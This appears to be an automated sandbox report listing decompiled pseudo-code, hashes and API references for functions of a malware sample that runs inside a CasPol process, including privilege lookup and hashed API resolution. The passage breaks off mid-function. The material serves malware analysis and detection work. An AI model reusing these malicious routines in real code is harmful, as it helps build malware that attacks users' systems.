Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
Instruction ID: 1b90bcd36e8a78153eba8f51a40a1fce6fab4eed9a3e5dfa1b1f9faf88a12c54
Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
Instruction Fuzzy Hash: 13F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159FE0897241C630F811CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6C3 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E6C3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041e6da
0x0041e6e8
0x0041e6ec

APIs

NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
Instruction ID: 9ee9210bb05c48301ec95111c73dbb9c9ea8a797f0d2d2d6377b377fa5d8e709
Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
Instruction Fuzzy Hash: 5ED01776604218ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C671FA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6BE Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E6BE(void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				long _t9;

				_t6 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x0041e6c6
0x0041e6da
0x0041e6e8
0x0041e6ec

APIs

NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
Instruction ID: a83627c48fb09607d7489d41a2bc8f9ecd1366b18a2a80a5dfb2e3b4a2810487
Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
Instruction Fuzzy Hash: F5E08C7A600204ABD610EBA4CC45ED73BA9DF88224F018459BE195B342C270FA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01619540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161954A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e0c234d12383c39a21b93518f7eee6174b4c029affecede4572d9901af64ff7
Instruction ID: f89577b427f6823acac08a3b8de9607d80fb0c52b0dcd70eba54068a01f39c8e
Opcode Fuzzy Hash: 3e0c234d12383c39a21b93518f7eee6174b4c029affecede4572d9901af64ff7
Instruction Fuzzy Hash: 1B900265311410030105A9990B05507004AA7D53A1361C021F5005650CD66188616561

Uniqueness

Uniqueness Score: -1.00%

Function 01619910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161991A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4ddffe07e53692628821183371d6b1102d4f8aff862b3a4fed77c27f076909d
Instruction ID: 68635564cb10fda9e7db6ecef8d0a817d5f023903227f3f8585c0f11d29c8933
Opcode Fuzzy Hash: d4ddffe07e53692628821183371d6b1102d4f8aff862b3a4fed77c27f076909d
Instruction Fuzzy Hash: FE9002B130141402D140759948057470009A7D0351F61C011E9054654EC6998DD57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 016195D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016195DA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b257b45f52f0f711cb5745e8be4e9a9c4c0c2308b076541934d7c8604b74c8a
Instruction ID: 07fdf3d03304d58740c0b1340aaa5490d795916f91b5198d6c813294730b2af4
Opcode Fuzzy Hash: 1b257b45f52f0f711cb5745e8be4e9a9c4c0c2308b076541934d7c8604b74c8a
Instruction Fuzzy Hash: AE9002A130241003410575994815617400EA7E0251B61C021E5004690DC56588917565

Uniqueness

Uniqueness Score: -1.00%

Function 016199A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016199AA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19751ac689646184a0c9825fb9e6cbf83bd16f32d037fd6dd9486663b2c59087
Instruction ID: a262a4b6482329616b32ac2fb26de1d2f0f5e05bbfd053c12cf4c5202df5a3f5
Opcode Fuzzy Hash: 19751ac689646184a0c9825fb9e6cbf83bd16f32d037fd6dd9486663b2c59087
Instruction Fuzzy Hash: 7C9002A134141442D10065994815B070009E7E1351F61C015E5054654DC659CC527566

Uniqueness

Uniqueness Score: -1.00%

Function 01619860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161986A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 555be5b8239ab00ded8697dd33bb6379c642f3d53a224c1b4ae54f2dbb8b766a
Instruction ID: e0620d04d4506619789732b27b72753c7a26d2fa5f863ace8a17fd7c4bfdc748
Opcode Fuzzy Hash: 555be5b8239ab00ded8697dd33bb6379c642f3d53a224c1b4ae54f2dbb8b766a
Instruction Fuzzy Hash: E790027130141413D11165994905707000DA7D0291FA1C412E4414658DD6968952B561

Uniqueness

Uniqueness Score: -1.00%

Function 01619840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161984A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e82f1425a3f1d0769a81a3a2beb972acfbe7dee928f785a58b2950bc578c4c0e
Instruction ID: 4cfac8e42e8d3baaf933058fb55f968ee8f83da25c2828dbc780d3af347a409e
Opcode Fuzzy Hash: e82f1425a3f1d0769a81a3a2beb972acfbe7dee928f785a58b2950bc578c4c0e
Instruction Fuzzy Hash: D6900261342451525545B5994805507400AB7E02917A1C012E5404A50CC5669856EA61

Uniqueness

Uniqueness Score: -1.00%

Function 016198F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016198FA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31dabe32109c09af5b11fe52e71d292c372eb77b3fabdccfafdfc97a8217879c
Instruction ID: 94ba26a7ddb5a7d844c00e98985643fc472871d893decbb3d45e938e801387ed
Opcode Fuzzy Hash: 31dabe32109c09af5b11fe52e71d292c372eb77b3fabdccfafdfc97a8217879c
Instruction Fuzzy Hash: E890026170141502D10175994805617000EA7D0291FA1C022E5014655ECA658992B571

Uniqueness

Uniqueness Score: -1.00%

Function 01619710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161971A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7baa83169e2fc271f6bad519a44195530be5d3655263ab75f66ecc62a3a4f0b
Instruction ID: 9e949753b8dbf872f4d88dee18043803981018653c0fb257511aed0788f4aa6a
Opcode Fuzzy Hash: b7baa83169e2fc271f6bad519a44195530be5d3655263ab75f66ecc62a3a4f0b
Instruction Fuzzy Hash: 6090027130141402D10069D958096470009A7E0351F61D011E9014655EC6A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 01619FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619FEA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cf9b2c8de49ce4fdb8847485f62940516ddc33303479f84987da0472863ccb4
Instruction ID: 78ebb723a184caac63d9d35361af2437df58621d7bf64d8b2e3bb4ab6e8b15e3
Opcode Fuzzy Hash: 9cf9b2c8de49ce4fdb8847485f62940516ddc33303479f84987da0472863ccb4
Instruction Fuzzy Hash: B290027131155402D110659988057070009A7D1251F61C411E4814658DC6D588917562

Uniqueness

Uniqueness Score: -1.00%

Function 016197A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016197AA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71fee13e9ffd2e3018ba54c1dbf719dfbc1b06be315b510b79087c0ef8fe8ad8
Instruction ID: 461da8af01f236437aa94dd6af84987abd6dcceed818e79686b445234ac4cf3a
Opcode Fuzzy Hash: 71fee13e9ffd2e3018ba54c1dbf719dfbc1b06be315b510b79087c0ef8fe8ad8
Instruction Fuzzy Hash: DC90026130141003D140759958196074009F7E1351F61D011E4404654CD95588566662

Uniqueness

Uniqueness Score: -1.00%

Function 01619780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161978A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13c48c6def0e3b305961bdb3d07db927bb0eb4a79cb65c6f2f4ef4d6e13db010
Instruction ID: 89d863556e182fee3a20df9a8937052a30d584eac9e661bcfa222d0f71e3e8bd
Opcode Fuzzy Hash: 13c48c6def0e3b305961bdb3d07db927bb0eb4a79cb65c6f2f4ef4d6e13db010
Instruction Fuzzy Hash: A890026931341002D1807599580960B0009A7D1252FA1D415E4005658CC95588696761

Uniqueness

Uniqueness Score: -1.00%

Function 01619660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161966A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 419b8aefd6fdf9347fe68719dbef0a3aa17e8319f4974c9f825e32960cd64133
Instruction ID: aba2685712c6f6520086a8071a75117ca47b9416760e7925d824455ed21ba36d
Opcode Fuzzy Hash: 419b8aefd6fdf9347fe68719dbef0a3aa17e8319f4974c9f825e32960cd64133
Instruction Fuzzy Hash: C990027130141802D1807599480564B0009A7D1351FA1C015E4015754DCA558A597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01619A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A5A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec5961c3713166976717f80de24f980899b9375fa21faf6abe1acffbcec1d9c0
Instruction ID: 1467d846da8dcd7c5e87a569229924ad85c0eb97272ee8d704f7f908cb9e19c0
Opcode Fuzzy Hash: ec5961c3713166976717f80de24f980899b9375fa21faf6abe1acffbcec1d9c0
Instruction Fuzzy Hash: 18900261311C1042D20069A94C15B070009A7D0353F61C115E4144654CC95588616961

Uniqueness

Uniqueness Score: -1.00%

Function 01619A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A2A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3e720a73a2da4fcfedc910f09222a84b8a3a01b2c0393b6afffa8fc8b94d407
Instruction ID: 6d49cb9b2a4baf39679fc3ded791af0972b79db2628636d6720c2295123c16f6
Opcode Fuzzy Hash: d3e720a73a2da4fcfedc910f09222a84b8a3a01b2c0393b6afffa8fc8b94d407
Instruction Fuzzy Hash: 7E90026170141042414075A98C459074009BBE1261761C121E4988650DC59988656AA5

Uniqueness

Uniqueness Score: -1.00%

Function 01619A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A0A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 972d25b8de16e57a14a8336e38bd8b0397da9097800e7bfb3af316035ca3751d
Instruction ID: f59635d3eda617772590ec5e10fddbe4a50e32daa6a34fae4d8d4703f8351a09
Opcode Fuzzy Hash: 972d25b8de16e57a14a8336e38bd8b0397da9097800e7bfb3af316035ca3751d
Instruction Fuzzy Hash: F790027130181402D10065994C1570B0009A7D0352F61C011E5154655DC665885179B1

Uniqueness

Uniqueness Score: -1.00%

Function 016196E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016196EA

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eecbe2aaa73b634eb8c0050dc43fa3c2f7fffb81d8fe378a41c24f2cfa97be89
Instruction ID: d16044c0bcd926f8d5d329fbbb7919e6dabbeb97672751a6da4ebd5ae8143567
Opcode Fuzzy Hash: eecbe2aaa73b634eb8c0050dc43fa3c2f7fffb81d8fe378a41c24f2cfa97be89
Instruction Fuzzy Hash: 0B90027130149802D1106599880574B0009A7D0351F65C411E8414758DC6D588917561

Uniqueness

Uniqueness Score: -1.00%

Function 0040990D Relevance: 1.6, APIs: 1, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040990D(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v63;
				char _v64;
				char _v68;
				void* _t13;
				int _t15;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				_pop(_t38);
				asm("sbb al, 0x83");
				asm("les edx, [ebp-0x75]");
				_t36 = _t38;
				_v64 = 0;
				E004201D3( &_v63, 0, 0x3f);
				E00420C83( &_v64, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t43, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t33 = _t15;
				if(_t33 != 0) {
					_t30 = _a8;
					_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t33(_t30, 0x8003, _t36 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x0040990d
0x0040990d
0x0040990e
0x00409912
0x00409914
0x00409924
0x00409928
0x00409933
0x00409938
0x00409943
0x0040995b
0x00409960
0x00409967
0x00409969
0x00409976
0x0040997a
0x0040999e
0x0040999e
0x0040997a
0x004099a6

APIs

PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
Instruction ID: 20480c24435e97d483933209d4d63d1bd1c3dc92514e9563bbea3aa723060474
Opcode Fuzzy Hash: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
Instruction Fuzzy Hash: 16110C71A4022476EB21A6A1DC83FFF776CDB45B44F14012EFE04BA1C2D6A9690587E9

Uniqueness

Uniqueness Score: -1.00%

Function 00409913 Relevance: 1.6, APIs: 1, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201D3( &_v67, 0, 0x3f);
				E00420C83( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x00409913
0x00409924
0x00409928
0x00409933
0x00409938
0x00409943
0x0040995b
0x00409960
0x00409967
0x00409969
0x00409976
0x0040997a
0x00000000
0x0040999e
0x0040997a
0x004099a6

APIs

PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
Instruction ID: 99f33223a06979dd19497cd07b2eb0eced799e52382c08ed34ba0aba74cfe4fe
Opcode Fuzzy Hash: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
Instruction Fuzzy Hash: BB01C871A4031476E721A691DC82FEF376C9B44B44F44012AFE04BA2C2D6A8690586E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9F4 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041E9F4(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t13;

				asm("stc");
				asm("out dx, al");
				asm("repne jo 0xffffffc8");
				_push(_t22);
				_t10 = _v0;
				E0041F203( *((intOrPtr*)(_v0 + 0x6d4)), _t10, _t10 + 0xab8,  *((intOrPtr*)(_v0 + 0x6d4)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t13;
			}

0x0041e9f6
0x0041e9f7
0x0041e9f8
0x0041ea03
0x0041ea06
0x0041ea1d
0x0041ea33
0x0041ea37

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
Instruction ID: 37147ff059de123ca1daa7b680345aa8e6bf5e2ed93d8c122108e99bdf0e5716
Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
Instruction Fuzzy Hash: D30169B66002086FDB14EF99DC81EEB37ADAF89354F058159FE0997242C235E8558BF0

Uniqueness

Uniqueness Score: -1.00%

Function 004099A7 Relevance: 1.6, APIs: 1, Instructions: 54
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004099A7(void* __eax, void* __ebx, void* __edx, signed int __esi, intOrPtr _a8, int _a12, char* _a16) {
				intOrPtr _v0;
				char* _v8;
				char* _v12;
				char _v64;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v688;
				char* _v692;
				intOrPtr __edi;
				void* _t64;
				int _t66;
				char* _t73;
				long _t79;
				int _t82;
				signed int _t84;

				_t84 = __esi * 0xffffffef;
				_t90 = _t84;
				if(_t84 > 0) {
					E00420C83(_t73, 3);
					_t70 = _a8;
					_t64 = E0040CF93(_t90, _a8 + 0x20,  &_v64); // executed
					_t66 = E004195B3(_a8 + 0x20, _t64, 0, 0, E00402E93(0xe49e13e4));
					_t82 = _t66;
					if(_t82 != 0) {
						_t79 = _a12;
						_t66 = PostThreadMessageW(_t79, 0x111, 0, 0); // executed
						if(_t66 == 0) {
							_t66 =  *_t82(_t79, 0x8003, _t84 + (E0040C663(1, 8, _t70 + 0x39c) & 0x000000ff) - 0x40, _t66);
						}
					}
					return _t66;
				} else {
					__eax = __eax + 0x90e7dfc8;
					__ebx = __ebx + 1;
					__eflags = __ebx;
					_push(__edx);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v12 = 0;
					_v692 = 0;
					 &_v688 = E004201D3( &_v688, 0, 0x2a4);
					__esi = _a12;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _v0;
					__eax = E00409913(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041FA23(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a12 = 0;
					while(1) {
						__eax = E00410363(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E733(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L12:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L16;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L12;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L12;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420153(_a12,  &_v688, 0x2a8);
										L16:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E6C3(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF43(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E0041DF83(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E0041F6C3(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E00420373( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t60 = __eax + 2; // 0x2
